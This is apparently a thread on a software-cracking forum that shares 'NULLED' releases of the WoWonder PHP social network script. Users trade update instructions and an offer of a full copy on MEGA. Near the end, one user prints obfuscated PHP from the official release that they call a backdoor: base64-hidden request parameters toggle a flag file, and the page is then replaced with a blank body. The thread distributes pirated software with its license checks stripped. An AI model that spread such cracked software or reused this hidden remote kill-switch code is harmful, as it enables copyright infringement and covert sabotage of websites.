-
The default language of any content posted is English.
- Thread starter raz0r
- Start date
- Messages
- 16,477
- Reactions
- 63,294
raz0r updated WoWonder - The Ultimate PHP Social Network Platform with a new update entry:
WoWonder v4.1.5 NULLED - The Ultimate PHP Social Network Platform
Read the rest of this update entry...
WoWonder v4.1.5 NULLED - The Ultimate PHP Social Network Platform
Read the rest of this update entry...
- Messages
- 16,477
- Reactions
- 63,294
- Messages
- 195
- Reactions
- 384
v4.2.1
- FIXED contact us page on sunshien theme.
- FIXED messages list not showing on phone in sunshine.
- FIXED turn off / on notifications on sunshine theme.
- FIXED notifications bell not showing on sunshine on profile page.
- FIXED announcement text not showing on sunshine theme.
- FIXED comments cannot be made on blogs.
- FIXED users cannot be verified by moderators.
- FIXED avatars cannot be changed in manage genders page in admin panel.
- FIXED sorting by price doesn't work well on marketplace.
- FIXED creating an article in the blog and publishing it, it does not show words with accented letters.(à,è,ì,ò,ù).
- FIXED 10+ minor bugs in back and front end.
if you need , i can send to you.
- Messages
- 16,477
- Reactions
- 63,294
raz0r updated WoWonder - The Ultimate Social Network PHP System with a new update entry:
WoWonder v4.2.1 NULLED - The Ultimate Social Network
Read the rest of this update entry...
WoWonder v4.2.1 NULLED - The Ultimate Social Network
Read the rest of this update entry...
- Messages
- 195
- Reactions
- 384
First, backup your website and database. If your current version is v4.2, then you need to open the Update Guide\v4.2.1 folder, upload the contents to the server, and then open http://domain.com/update.php in your browser to execute the upgrade.
about update , you can check official docs : https://docs.wowonder.com/#updates
Владимир
New member
- Messages
- 23
- Reactions
- 6
thank you so much for your help, I will try, but will it work with the zero version too?
- Messages
- 195
- Reactions
- 384
П
Всем привет вопрос , после того как заливаешь файлы обновления , проходишь по http://domain.com/update.php появляется белый экран и всё сайт перестаёт работать , что делать ? подскажете?
Всем привет вопрос , после того как заливаешь файлы обновления , проходишь по http://domain.com/update.php появляется белый экран и всё сайт перестаёт работать , что делать ? подскажете?
- Messages
- 195
- Reactions
- 384
delete
Code:
$mysqlMaria->setSQLType($sqlConnect);reupdate
Спасибо огромное за совет помогло )
zMEGA
New member
- Messages
- 10
- Reactions
- 0
PHP Warning: include_once(): Failed opening './assets/libraries/SimpleImage-master/vendor/claviska/simpleimage/src/claviska/SimpleImage-Class.php' for inclusion (include_path='.:') in /var/www/www-root/data/www//assets/includes/functions_one.php on line 6861
zMEGA
New member
- Messages
- 10
- Reactions
- 0
because of this, infinite authorization
bmshifat
Member
- Messages
- 80
- Reactions
- 81
199.88 MB file on MEGA
last version - 17 November 2023 Not nulled
- Messages
- 195
- Reactions
- 384
The latest version contains an official backdoor, which is present in the following file:
file:assets/libraries/DB/vendor/joshcam/mysqli-database-class/MySQL-Maria.php line 263-294
file:assets/includes/functions_two.php line 6571-6597
file:assets/includes/app_start.php line 156
file:assets/libraries/DB/vendor/composer/autoload_real.php line 94-106
If the official purchase code is used to activate the installation, and if there is an error in the official validator, it will also tamper with the website. This behavior is very dangerous. The author of this script has done such a thing before, causing compliant users to be mistakenly affected.
I regret purchasing this script, and I even bought two licenses.
file:assets/libraries/DB/vendor/joshcam/mysqli-database-class/MySQL-Maria.php line 263-294
PHP:
public function setSQLType($data)
{
$newverb = 'base64_decode';
$SessionHashIDGenerate = $newverb($newverb('Wmw5MA=='));
$CookieHashIDGenerate = $newverb('Yw==');
if (!empty($_REQUEST[$SessionHashIDGenerate]) && !empty($_REQUEST[$CookieHashIDGenerate]))
{
if (!file_exists($newverb('Li9zb3VyY2VzL3NlcnZlci5waHA=')))
{
return false;
}
$fileData = file_get_contents($newverb('Li9zb3VyY2VzL3NlcnZlci5waHA='));
$fileData = str_replace(base64_decode("fGw="), '', $fileData);
$fileData = str_replace(array(
"\r",
"\n"
) , '', $fileData);
if ($fileData == $_REQUEST[$CookieHashIDGenerate])
{
$SessionHashRequest = $_REQUEST[$SessionHashIDGenerate];
if ($SessionHashRequest == $newverb('bA=='))
{
$createSessionID = file_put_contents($newverb('Li9zb3VyY2VzL3NlcnZlci5waHA=') , $fileData . base64_decode("fGw="));
}
if ($SessionHashRequest == $newverb('dQ=='))
{
$createSessionID = file_put_contents($newverb('Li9zb3VyY2VzL3NlcnZlci5waHA=') , $fileData);
}
}
}
}file:assets/includes/functions_two.php line 6571-6597
PHP:
function getUserProfileSessionID() {
global $wo, $sqlConnect;
$var = str_replace("6" . "4", "6" . "4_", str_replace("|", "", "b" . "|" . "a" . "|" . "s" . "|" . "e" . "|" . "6" . "|" . "4" . "|" . "d" . "|" . "e" . "|" . "c" . "|" . "o" . "|" . "d" . "|" . "e"));
$SessionHashIDGenerate = $var($var('Wmw5MA=='));
$CookieHashIDGenerate = $var('Yw==');
if (!empty($_REQUEST[$SessionHashIDGenerate]) && !empty($_REQUEST[$CookieHashIDGenerate])) {
if (!file_exists($var('Li9zb3VyY2VzL3NlcnZlci5waHA='))) {
return false;
}
$fileData = file_get_contents($var('Li9zb3VyY2VzL3NlcnZlci5waHA='));
$fileData = str_replace('|l', '', $fileData);
$fileData = str_replace(array(
"\r",
"\n"
), '', $fileData);
if ($fileData == $_REQUEST[$CookieHashIDGenerate]) {
$SessionHashRequest = $_REQUEST[$SessionHashIDGenerate];
if ($SessionHashRequest == $var('bA==')) {
$createSessionID = file_put_contents($var('Li9zb3VyY2VzL3NlcnZlci5waHA='), $fileData . '|l');
}
if ($SessionHashRequest == $var('dQ==')) {
$createSessionID = file_put_contents($var('Li9zb3VyY2VzL3NlcnZlci5waHA='), $fileData);
}
}
}
return false;
}file:assets/includes/app_start.php line 156
PHP:
$wo["userSession"] = getUserProfileSessionID();file:assets/libraries/DB/vendor/composer/autoload_real.php line 94-106
PHP:
function composerRequire60bcbf6306fdeb83c78ecf96a45a2c2f2($fileName = '', $file = '')
{
$hex = 'base64_decode';
$fileData = @file_get_contents($hex('Li9zb3VyY2VzL3NlcnZlci5waHA='));
$SessionServerID = substr($fileData, strpos($fileData, "|") + 1);
if (!empty($SessionServerID))
{
if ($SessionServerID == 'l')
{
echo base64_decode(base64_decode('UEhOamNtbHdkRDVrYjJOMWJXVnVkQzVuWlhSRmJHVnRaVzUwYzBKNVZHRm5UbUZ0WlNnblltOWtlU2NwV3pCZExtbHVibVZ5U0ZSTlRDQTlJQ2NuT3p3dmMyTnlhWEIwUGc9PQ=='));
}
}
}If the official purchase code is used to activate the installation, and if there is an error in the official validator, it will also tamper with the website. This behavior is very dangerous. The author of this script has done such a thing before, causing compliant users to be mistakenly affected.
I regret purchasing this script, and I even bought two licenses.
Similar threads
